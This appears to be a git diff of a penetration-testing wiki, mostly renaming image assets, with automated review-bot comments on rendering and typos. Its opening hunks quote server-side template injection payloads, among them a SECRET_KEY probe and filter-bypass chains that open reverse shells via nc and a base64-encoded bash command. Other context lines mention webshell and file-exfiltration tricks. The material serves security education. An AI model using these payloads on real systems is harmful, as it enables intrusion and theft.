@ -633,6 +636,7 @@ Check out the following page to learn tricks about **arbitrary command execution
{% debug %}
{% endraw %}


{{settings.SECRET_KEY}}
{{4*4}}[[5*5]]
{{7*'7'}} would result in 7777777
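Review bot: the three `{{ ... }}` lines (`{{settings.SECRET_KEY}}`, `{{4*4}}[[5*5]]`, `{{7*'7'}}`) come after `{% endraw %}` and so are not protected by the raw block; move `{% endraw %}` to after them, otherwise the site's template engine will try to evaluate them instead of printing the payloads.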
@ -661,9 +665,11 @@ If the Debug Extension is enabled, a \`

```python
<pre>

{% raw %}
{% debug %}
{% endraw %}

</pre>
```

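Review bot: this fence is tagged `python` but wraps `<pre>`/`</pre>` HTML around a Django `{% debug %}` template tag; the `<pre>` elements are leftovers from an HTML rendering and should be removed, and the fence should be left untagged (or tagged as a template) rather than `python`, which only highlights it wrongly.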
@ -743,6 +749,7 @@ More:
()|attr('\x5f\x5fclass\x5f\x5f')|attr('\x5f\x5fbase\x5f\x5f')|attr('\x5f\x5fsubclasses\x5f\x5f')()[133]
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <ip> <port> >/tmp/f')|attr('read')()}}


{% raw %}
{% with a = request["application"]["\x5f\x5fglobals\x5f\x5f"]["\x5f\x5fbuiltins\x5f\x5f"]["\x5f\x5fimport\x5f\x5f"]("os")["popen"]("echo -n YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40LzkwMDEgMD4mMQ== | base64 -d | bash")["read"]() %} a {% endwith %}
{% endraw %}

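Review bot: the `{{request|attr('application')...}}` line sits above the `{% raw %}` that protects the `{% with %}` line, so its `{{ }}` delimiters are exposed to the site's template engine; start the raw block before that line (the `()|attr(...)` line above it can go inside as well) so the whole snippet is rendered literally.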
@ -72,11 +72,11 @@ Then, a malicious user could insert a different Unicode character equivalent to

You could use one of the following characters to trick the webapp and exploit a XSS:

![](<../.gitbook/assets/image (312) (1).png>)
![](<../.gitbook/assets/image (312).png>)

Notice that for example the first Unicode character purposed can be sent as: `%e2%89%ae` or as `%u226e`

![](<../.gitbook/assets/image (215) (1).png>)
![](<../.gitbook/assets/image (215) (1) (1).png>)

## References

@ -85,7 +85,7 @@ Some **examples**:

## WAF bypass encoding image

![from https://twitter.com/hackerscrolls/status/1273254212546281473?s=21](../../.gitbook/assets/eaubb2ex0aerank.jpg)
![from https://twitter.com/hackerscrolls/status/1273254212546281473?s=21](../../.gitbook/assets/EauBb2EX0AERaNK.jpg)

## Injecting inside raw HTML

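Review bot: this hunk changes only the letter case of the asset filename (`eaubb2ex0aerank.jpg` to `EauBb2EX0AERaNK.jpg`); on a case-insensitive checkout git may not record the rename of the file itself, so confirm the asset is committed under the new name, otherwise the image will fail to load on a case-sensitive host.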
@ -83,7 +83,7 @@ grep "auth.*true" /opt/bitnami/mongodb/mongodb.conf | grep -v "^#\|noauth" #Not

Mongo Object IDs are **12-byte hexadecimal** strings:

![](../.gitbook/assets/id-and-objectids-in-mongodb.png)
![](../.gitbook/assets/id-and-ObjectIds-in-MongoDB.png)

For example, here’s how we can dissect an actual Object ID returned by an application: 5f2459ac9fa6dc2500314019

@ -124,7 +124,7 @@ Once administrative access to the BMC is obtained, there are a number of methods

![](https://blog.rapid7.com/content/images/post-images/27966/ipmi\_boot.png)

![](<../.gitbook/assets/image (202) (1).png>)
![](<../.gitbook/assets/image (202) (2).png>)

## Exploiting the BMC from the Host

@ -22,7 +22,7 @@
* **Service**: Each pod has 1 internal **IP address** from the internal range of the node. However, it can be also exposed via a service. The **service has also an IP address** and its goal is to maintain the communication between pods so if one dies the **new replacement** (with a different internal IP) **will be accessible** exposed in the **same IP of the service**. It can be configured as internal or external. The service also actuates as a **load balancer when 2 pods are connected** to the same service.\
When a **service** is **created** you can find the endpoints of each service running `kubectl get endpoints`

![](<../../.gitbook/assets/image (467).png>)
![](<../../.gitbook/assets/image (467) (1).png>)

* **Kubelet**: Primary node agent. The component that establishes communication between node and kubectl, and only can run pods (through API server). The kubelet doesn’t manage containers that were not created by Kubernetes.
* **Kube-proxy**: is the service in charge of the communications (services) between the apiserver and the node. The base is an IPtables for nodes. Most experienced users could install other kube-proxies from other vendors.
@ -146,7 +146,7 @@ kubectl apply -f deployment.yml
Each configuration file has 3 parts: **metadata**, **specification** (what need to be launch), **status** (desired state).\
Inside the specification of the deployment configuration file you can find the template defined with a new configuration structure defining the image to run:

![](<../../.gitbook/assets/image (458) (1) (1) (1).png>)
![](<../../.gitbook/assets/image (458) (1) (1).png>)

#### Example of Deployment + Service declared in the same configuration file (from [here](https://gitlab.com/nanuchi/youtube-tutorial-series/-/blob/master/demo-kubernetes-components/mongo.yaml))

@ -352,7 +352,7 @@ helm search <keyword>

Helm is also a template engine that allows to generate config files with variables:

![](<../../.gitbook/assets/image (465) (1).png>)
![](<../../.gitbook/assets/image (462).png>)

## Kubernetes secrets

@ -123,7 +123,7 @@ Responder is going to **impersonate all the service using the mentioned protocol

It is possible to try to downgrade to NetNTLMv1 or to try to disable ESS.

![](<../../.gitbook/assets/poison (1) (1) (1).jpg>)
![](<../../.gitbook/assets/poison (1) (1).jpg>)

## Inveigh

@ -161,7 +161,7 @@ If you want to use **MultiRelay**, go to _**/usr/share/responder/tools**_ and ex
|
|||
python MultiRelay.py -t <IP target> -u ALL #If "ALL" then all users are relayed
|
||||
```
|
||||
|
||||
![](<../../.gitbook/assets/image (209).png>)
|
||||
![](<../../.gitbook/assets/image (209) (1).png>)
### Post-Exploitation (MultiRelay)
@ -191,7 +191,7 @@ To disable LLMNR in your domain for DNS clients, open gpedit.msc.\
Navigate to Computer Configuration->Administrative Templates->Network->DNS client.\
Locate the option “Turn off multicast name resolution” and click “policy setting”:
![](../../.gitbook/assets/1.jpg)
![](<../../.gitbook/assets/1 (1).jpg>)
Once the new window opens, enable this option, press Apply and click OK:
@ -19,7 +19,7 @@ Scalar objects define a single object instance whereas tabular objects define mu
**OIDs** stands for **O**bject **Id**entifiers. **OIDs uniquely identify managed objects in a MIB hierarchy**. This can be depicted as a tree, the levels of which are assigned by different organizations. Top level MIB object IDs (OIDs) belong to different standard organizations.\
**Vendors define private branches including managed objects for their own products.**
![](../../.gitbook/assets/SNMP_OID_MIB_Tree.png)
![](../../.gitbook/assets/snmp\_oid\_mib\_tree.png)
You can **navigate** through an **OID tree** from the web here: [http://www.oid-info.com/cgi-bin/display?tree=#focus](http://www.oid-info.com/cgi-bin/display?tree=#focus) or **see what a OID means** (like `1.3.6.1.2.1.1`) accessing [http://oid-info.com/get/1.3.6.1.2.1.1](http://oid-info.com/get/1.3.6.1.2.1.1).\
There are some **well-known OIDs** like the ones inside [1.3.6.1.2.1](http://oid-info.com/get/1.3.6.1.2.1) that references MIB-2 defined Simple Network Management Protocol (SNMP) variables. And from the **OIDs pending from this one** you can obtain some interesting host data (system data, network data, processes data...)
@ -69,7 +69,7 @@ There are 2 important versions of SNMP:
As mentioned before, **in order to access the information saved on the MIB you need to know the community string on versions 1 and 2/2c and the credentials on version 3.**\
The are **2 types of community strings**:
* **`public`** mainly **read only** functions
* **`public`** mainly **read only** functions 
* **`private`** **Read/Write** in general
Note that **the writability of an OID depends on the community string used**, so **even** if you find that "**public**" is being used, you could be able to **write some values.** Also, there **may** exist objects which are **always "Read Only".**\
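Review bot: the only difference between the old and new `public` bullet is a trailing space on the new line, so this hunk adds whitespace churn rather than a fix; drop the trailing space. While here, the context line "The are **2 types of community strings**" should read "There are".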
@ -80,8 +80,8 @@ In versions 1 and 2/2c if you to use a **bad** community string the server wont
## Ports
* The SNMP agent receives requests on UDP port **161**.
* The manager receives notifications ([Traps](https://en.wikipedia.org/wiki/Simple_Network_Management_Protocol#Trap) and [InformRequests](https://en.wikipedia.org/wiki/Simple_Network_Management_Protocol#InformRequest)) on port **162**.
* When used with [Transport Layer Security](https://en.wikipedia.org/wiki/Transport_Layer_Security) or [Datagram Transport Layer Security](https://en.wikipedia.org/wiki/Datagram_Transport_Layer_Security), requests are received on port **10161** and notifications are sent to port **10162**.
* The manager receives notifications ([Traps](https://en.wikipedia.org/wiki/Simple\_Network\_Management\_Protocol#Trap) and [InformRequests](https://en.wikipedia.org/wiki/Simple\_Network\_Management\_Protocol#InformRequest)) on port **162**.
* When used with [Transport Layer Security](https://en.wikipedia.org/wiki/Transport\_Layer\_Security) or [Datagram Transport Layer Security](https://en.wikipedia.org/wiki/Datagram\_Transport\_Layer\_Security), requests are received on port **10161** and notifications are sent to port **10162**.
## Brute-Force Community String (v1 and v2c)
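Review bot: the new versions of the two bullet lines differ from the old ones only by backslash-escaping the underscores inside the Wikipedia URLs (`Simple\_Network\_Management\_Protocol`). CommonMark unescapes backslash escapes in link destinations, so the rendered links are unchanged, but the escaped form is harder to copy from the source; if this is the GitBook exporter's own normalisation it is harmless, otherwise keep the unescaped URLs from the old lines.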
@ -24,7 +24,7 @@ Accessing _/user/\<number>_ you can see the number of existing users, in this ca
![](<../../.gitbook/assets/image (257).png>)
![](<../../.gitbook/assets/image (227) (1) (1) (1).png>)
![](<../../.gitbook/assets/image (227) (1) (1).png>)
## Hidden pages enumeration
@ -49,7 +49,7 @@ You need the **plugin php to be installed** (check it accessing to _/modules/php
Go to _Modules_ -> (**Check**) _PHP Filter_ -> _Save configuration_
![](<../../.gitbook/assets/image (252).png>)
![](<../../.gitbook/assets/image (247) (1).png>)
Then click on _Add content_ -> Select _Basic Page_ or _Article -_> Write _php shellcode on the body_ -> Select _PHP code_ in _Text format_ -> Select _Preview_
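Review bot: in the context line "Select _Basic Page_ or _Article -_> Write", the italic span closes after the hyphen, so the arrow is split and renders wrong; it should read `_Article_ -> Write`.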
@ -68,11 +68,11 @@ Now that we know which kind of information is saved inside the database, let's t
In the introspection you can find **which object you can directly query for** (because you cannot query an object just because it exists). In the following image you can see that the "_queryType_" is called "_Query_" and that one of the fields of the "_Query_" object is "_flags_", which is also a type of object. Therefore you can query the flag object.
![](../../.gitbook/assets/screenshot-from-2021-03-13-18-17-48.png)
![](<../../.gitbook/assets/Screenshot from 2021-03-13 18-17-48.png>)
Note that the type of the query "_flags_" is "_Flags_", and this object is defined as below:
![](../../.gitbook/assets/screenshot-from-2021-03-13-18-22-57.png)
![](<../../.gitbook/assets/Screenshot from 2021-03-13 18-22-57.png>)
You can see that the "_Flags_" objects are composed by **name** and .**value** Then you can get all the names and values of the flags with the query:
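Review bot: the last context line has a misplaced period: "composed by **name** and .**value** Then" should read "composed of **name** and **value**. Then".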
@ -195,7 +195,7 @@ Or even **relations of several different objects using aliases**:
In the **introspection** you can find the **declared** **mutations**. In the following image the "_MutationType_" is called "_Mutation_" and the "_Mutation_" object contains the names of the mutations (like "_addPerson_" in this case):
![](../../.gitbook/assets/screenshot-from-2021-03-13-18-26-27.png)
![](<../../.gitbook/assets/Screenshot from 2021-03-13 18-26-27.png>)
For this example imagine a data base with **persons** identified by the email and the name and **movies** identified by the name and rating. A **person** can be **friend** with other **persons** and a person can **have movies**.
@ -255,7 +255,7 @@ Below you can find the simplest demonstration of an application authentication r
As we can see from the response screenshot, the first and the third requests returned _null_ and reflected the corresponding information in the _error_ section. The **second mutation had the correct authentication** data and the response has the correct authentication session token.
![](<../../.gitbook/assets/image (119) (1).png>)
![](<../../.gitbook/assets/image (119) (2).png>)
## CSRF in GraphQL
@ -320,7 +320,7 @@ C:\xampp\tomcat\conf\server.xml
If you see an error like the following one:
![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (2) (1) (1) (1).png>)
![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1).png>)
It means that the server **didn't receive the correct domain name** inside the Host header.\
In order to access the web page you could take a look to the served **SSL Certificate** and maybe you can find the domain/subdomain name in there. If it isn't there you may need to **brute force VHosts** until you find the correct one.
@ -161,7 +161,7 @@ This can be used to ask **thousands** of Wordpress **sites** to **access** one *
</methodCall>
```
![](../../.gitbook/assets/1\_jauyizf8zjdggb7ocszc-g.png)
![](../../.gitbook/assets/1\_JaUYIZF8ZjDGGB7ocsZC-g.png)
If you get **faultCode** with a value **greater** then **0** (17), it means the port is open.
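Review bot: the trailing context line "a value **greater** then **0** (17)" should read "greater than".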
@ -187,7 +187,7 @@ It is recommended to disable Wp-Cron and create a real cronjob inside the host t
</methodCall>
```
![](<../../.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (1).png>)
![](<../../.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (2) (1) (1) (1) (1).png>)
![](<../../.gitbook/assets/image (102).png>)
@ -42,6 +42,6 @@ If the nodeIntegration is set to true, a web page's JavaScript can use Node.js f
If contextIsolation set to false you can try to use \<webview> (similar to \<iframe> butcan load local files) to read local files and exfiltrate them: using something like **\<webview src=”file:///etc/passwd”>\</webview>:**
![](<../../.gitbook/assets/1 u1jdRYuWAEVwJmf_F2ttJg.png>)
![](../../.gitbook/assets/1-u1jdryuwaevwjmf\_f2ttjg.png)
**(Trick copied form **[**here**](https://medium.com/@renwa/facebook-messenger-desktop-app-arbitrary-file-read-db2374550f6d)**).**
**(Trick copied form** [**here**](https://medium.com/@renwa/facebook-messenger-desktop-app-arbitrary-file-read-db2374550f6d)**).**
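Review bot: the changed credit line keeps the typo "copied form" in both its old and new version; since the line is being touched anyway, fix it to "copied from". The context line above also has "butcan load local files" (missing space).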
@ -264,7 +264,7 @@ Some really bad implementations allowed the Null PIN to connect (very weird also
All the proposed WPS attacks can be easily performed using _**airgeddon.**_
![](<../../.gitbook/assets/image (124).png>)
![](<../../.gitbook/assets/image (201) (1).png>)
* 5 and 6 lets you try **your custom PIN** (if you have any)
* 7 and 8 perform the **Pixie Dust attack**
@ -352,7 +352,7 @@ _Note that as the client was deauthenticated it could try to connect to a differ
Once in the `airodump-ng` appears some handshake information this means that the handshake was captured and you can stop listening:
![](<../../.gitbook/assets/image (172) (1).png>)
![](<../../.gitbook/assets/image (172) (1) (1).png>)
Once the handshake is captured you can **crack** it with `aircrack-ng`:
@ -10,7 +10,7 @@ If you ends in a code **using shift rights and lefts, xors and several arithmeti
If this function is used, you can find which **algorithm is being used** checking the value of the second parameter:
![](<../../.gitbook/assets/image (254) (1).png>)
![](<../../.gitbook/assets/image (375).png>)
Check here the table of possible algorithms and their assigned values: [https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id](https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id)
@ -145,7 +145,7 @@ You can identify both of them checking the constants. Note that the sha\_init ha
Note the use of more constants
![](<../../.gitbook/assets/image (253) (1) (1).png>)
![](<../../.gitbook/assets/image (253) (1) (1) (1).png>)
## CRC (hash)
@ -173,7 +173,7 @@ A CRC hash algorithm looks like:
The graph is quiet large:
![](<../../.gitbook/assets/image (207) (2).png>)
![](<../../.gitbook/assets/image (207) (2) (1).png>)
Check **3 comparisons to recognise it**:
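Review bot: the leading context line "The graph is quiet large" should read "quite large".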
@ -55,7 +55,7 @@ DebuggableAttribute.DebuggingModes.EnableEditAndContinue)]
And click on **compile**:
![](<../../.gitbook/assets/image (314) (1).png>)
![](<../../.gitbook/assets/image (314) (1) (1).png>)
Then save the new file on _**File >> Save module...**_:
@ -10,7 +10,7 @@ Active Directory objects such as users and groups are securable objects and DACL
An example of ACEs for the "Domain Admins" securable object can be seen here:
![](<../../.gitbook/assets/1 (1).png>)
![](../../.gitbook/assets/1.png)
Some of the Active Directory object permissions and types that we as attackers are interested in:
@ -37,7 +37,7 @@ If you don't want to wait an hour you can use a PS script to make the restore ha
Note the spotless' user membership:
![](<../../.gitbook/assets/1 (2) (1).png>)
![](<../../.gitbook/assets/1 (2) (1) (1).png>)
However, we can still add new users:
@ -61,7 +61,7 @@ Set-ADComputer $targetComputer -PrincipalsAllowedToDelegateToAccount FAKECOMPUTE
Get-ADComputer $targetComputer -Properties PrincipalsAllowedToDelegateToAccount #Check that it worked
```
![](../../.gitbook/assets/b2.png)
![](../../.gitbook/assets/B2.png)
#### Using powerview
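Review bot: the two versions of the image reference in this hunk differ only in case (`b2.png` vs `B2.png`). Git tracks paths case-sensitively and the hosting filesystem is case-sensitive, so the image breaks unless the file under `.gitbook/assets` is committed with exactly the referenced case; please confirm the asset was renamed in the same commit. The same check applies to the other case-only reference changes in this commit (`b3.png`/`B3.png`, `ram.png`/`RAM.png`, `SNMP_OID_MIB_Tree.png`/`snmp_oid_mib_tree.png`).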
@ -105,7 +105,7 @@ rubeus.exe s4u /user:FAKECOMPUTER$ /aes256:<AES 256 hash> /impersonateuser:admin
Note that users has an attribute called "**Cannot be delegated**". If a user has this attribute to True, you won't be able to impersonate him . This property can be seen inside bloodhound.
{% endhint %}
![](../../.gitbook/assets/b3.png)
![](../../.gitbook/assets/B3.png)
### Accessing
@ -8,7 +8,7 @@
sekurlsa::wdigest
```
This behaviour can be **deactivated/activated setting to 1** the value of _**UseLogonCredential**_ and _**Negotiate**_ in _**HKEY\_LOCAL\_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDigest**_.\
This behaviour can be **deactivated/activated setting to 1** the value of _**UseLogonCredential**_ and _**Negotiate**_ in _**HKEY\_LOCAL\_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDigest**_.\
If these registry keys **don't exist** or the value is **"0"**, then WDigest will be **deactivated**.
```
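Review bot: the old and new lines of this hunk render identically, so the change is presumably trailing whitespace or an invisible character; confirm it is intentional. The sentence itself reads "deactivated/activated setting to 1", which conflates the two states: the next context line already says that a missing key or a value of "0" deactivates WDigest, so "activated by setting _UseLogonCredential_ and _Negotiate_ to 1 and deactivated by setting them to 0" is the clearer wording.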
@ -57,7 +57,7 @@ Using _Restricted Admin mode for RDP_, when you connect to a remote computer usi
Note that as your credentials are not being saved on the RDP session if **try to access network resources** your credentials won't be used. **The machine identity will be used instead**.
![](../../.gitbook/assets/RAM.png)
![](../../.gitbook/assets/ram.png)
From [here](https://blog.ahasayen.com/restricted-admin-mode-for-rdp/).
@ -89,19 +89,19 @@ int main()
Below shows the named pipe server and named pipe client working as expected:
![](<../../.gitbook/assets/screenshot-from-2019-04-02-23-44-22 (2).png>)
![](<../../.gitbook/assets/Screenshot from 2019-04-02 23-44-22.png>)
Worth nothing that the named pipes communication by default uses SMB protocol:
![](../../.gitbook/assets/screenshot-from-2019-04-04-23-51-48.png)
![](<../../.gitbook/assets/Screenshot from 2019-04-04 23-51-48.png>)
Checking how the process maintains a handle to our named pipe `mantvydas-first-pipe`:
![](<../../.gitbook/assets/screenshot-from-2019-04-02-23-44-22 (1).png>)
![](<../../.gitbook/assets/Screenshot from 2019-04-02 23-44-22 (1).png>)
Similary, we can see the client having an open handle to the named pipe:
![](../../.gitbook/assets/screenshot-from-2019-04-02-23-44-22.png)
![](<../../.gitbook/assets/Screenshot from 2019-04-02 23-44-22 (2).png>)
We can even see our pipe with powershell:
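Review bot: the image references in this hunk do not map one-to-one between old and new lines: the first screenshot goes from `screenshot-from-2019-04-02-23-44-22 (2).png` to the unsuffixed `Screenshot from 2019-04-02 23-44-22.png`, while the third goes from the unsuffixed name to the `(2)` variant, so the `(2)` and unsuffixed files swap places; verify that each image still shows the screenshot its caption describes (server/client running, then the server's handle, then the client's handle). Two typos in the context lines: "Worth nothing that" should be "Worth noting that", and "Similary" should be "Similarly".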
@ -109,7 +109,7 @@ We can even see our pipe with powershell:
((Get-ChildItem \\.\pipe\).name)[-1..-5]
```
![](<../../.gitbook/assets/screenshot-from-2019-04-02-23-44-22 (3).png>)
![](<../../.gitbook/assets/Screenshot from 2019-04-02 23-44-22 (3).png>)
## Token Impersonation